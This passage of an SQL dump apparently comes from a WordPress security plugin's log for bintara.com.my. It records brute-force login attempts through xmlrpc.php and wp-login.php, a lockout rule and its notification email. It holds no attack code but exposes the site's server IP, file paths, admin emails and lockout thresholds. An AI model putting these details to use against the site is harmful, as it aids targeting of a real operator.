.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/test/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRF12XkG1atThADMYGPqgAAAMc\";s:12:\"REDIRECT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"192.95.49.115\";s:11:\"REMOTE_PORT\";s:5:\"42426\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/test/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRF12XkG1atThADMYGPqgAAAMc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566852567.4163\";s:12:\"REQUEST_TIME\";s:10:\"1566852567\";}}','notice','2019-08-26 20:49:29','2019-08-26 20:49:27',18304456,19506984,'http://bintara.com.my/test/xmlrpc.php',1,0,'192.95.49.115'),(23268,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/v2/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"357\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/v2/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/v2/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRF1xTEVi0fEJEHuDZaWQAAAA0\";s:12:\"REDIRECT_URL\";s:14:\"/v2/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:12:\"46.32.240.33\";s:11:\"REMOTE_PORT\";s:5:\"38204\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/v2/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:14:\"/v2/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRF1xTEVi0fEJEHuDZaWQAAAA0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566852567.353\";s:12:\"REQUEST_TIME\";s:10:\"1566852567\";}}','notice','2019-08-26 20:49:29','2019-08-26 20:49:27',18308696,19509608,'http://bintara.com.my/v2/xmlrpc.php',1,0,'46.32.240.33'),(23267,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/beta/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"340\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/beta/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/beta/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRFyBTEVi0fEJEHuDZaNgAAABA\";s:12:\"REDIRECT_URL\";s:16:\"/beta/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"150.95.104.20\";s:11:\"REMOTE_PORT\";s:5:\"56598\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/beta/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/beta/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRFyBTEVi0fEJEHuDZaNgAAABA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566852552.1347\";s:12:\"REQUEST_TIME\";s:10:\"1566852552\";}}','notice','2019-08-26 20:49:15','2019-08-26 20:49:12',18313440,19596544,'http://bintara.com.my/beta/xmlrpc.php',1,0,'150.95.104.20'),(23266,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/www/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"339\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/www/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/www/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRFuGXkG1atThADMYGPmgAAANU\";s:12:\"REDIRECT_URL\";s:15:\"/www/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:15:\"184.168.152.221\";s:11:\"REMOTE_PORT\";s:5:\"41932\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/www/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/www/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRFuGXkG1atThADMYGPmgAAANU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566852536.199\";s:12:\"REQUEST_TIME\";s:10:\"1566852536\";}}','notice','2019-08-26 20:48:58','2019-08-26 20:48:56',18309232,19510352,'http://bintara.com.my/www/xmlrpc.php',1,0,'184.168.152.221'),(23265,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/cms/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"342\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/cms/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/cms/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRFtxTEVi0fEJEHuDZaKwAAAAg\";s:12:\"REDIRECT_URL\";s:15:\"/cms/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"212.145.243.67\";s:11:\"REMOTE_PORT\";s:5:\"59942\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/cms/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/cms/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRFtxTEVi0fEJEHuDZaKwAAAAg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566852535.3473\";s:12:\"REQUEST_TIME\";s:10:\"1566852535\";}}','notice','2019-08-26 20:48:57','2019-08-26 20:48:55',18306904,19506976,'http://bintara.com.my/cms/xmlrpc.php',1,0,'212.145.243.67'),(23264,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"50.62.190.126\";s:11:\"REMOTE_PORT\";s:5:\"33778\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWREzRTEVi0fEJEHuDZZeAAAAAw\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566852301.842\";s:12:\"REQUEST_TIME\";s:10:\"1566852301\";}}','notice','2019-08-26 20:45:03','2019-08-26 20:45:02',18207896,19507648,'https://bintara.com.my/xmlrpc.php',1,0,'50.62.190.126'),(23263,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"50.62.190.126\";s:11:\"REMOTE_PORT\";s:5:\"60812\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWREyh90bn5mtr-PXqq4dgAAAE0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566852298.8806\";s:12:\"REQUEST_TIME\";s:10:\"1566852298\";}}','notice','2019-08-26 20:45:00','2019-08-26 20:44:59',17689784,19180064,'https://bintara.com.my/wp-login.php',1,0,'50.62.190.126'),(23260,0,'lockout','username-lockout::bintara.com.my','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:14:\"bintara.com.my\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-08-27 04:34:08\";s:17:\"lockout_start_gmt\";s:19:\"2019-08-26 20:34:08\";s:14:\"lockout_expire\";s:19:\"2019-08-27 04:49:08\";s:18:\"lockout_expire_gmt\";s:19:\"2019-08-26 20:49:08\";s:16:\"lockout_username\";s:14:\"bintara.com.my\";}','action','2019-08-26 20:34:12','2019-08-26 20:34:08',18387184,19589976,'http://bintara.com.my/old/xmlrpc.php',1,0,'103.120.178.112'),(23261,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-08-26 20:34:12','2019-08-26 20:34:08',18594208,19589976,'http://bintara.com.my/old/xmlrpc.php',1,0,'103.120.178.112'),(23262,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"85\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"46.164.141.55\";s:11:\"REMOTE_PORT\";s:5:\"63809\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRCzw0@TGWC-1tzGX5e8wAAAJc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566851791.666\";s:12:\"REQUEST_TIME\";s:10:\"1566851791\";}}','notice','2019-08-26 20:36:32','2019-08-26 20:36:32',17685680,19176136,'https://bintara.com.my/wp-login.php',1,0,'46.164.141.55'),(23259,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your 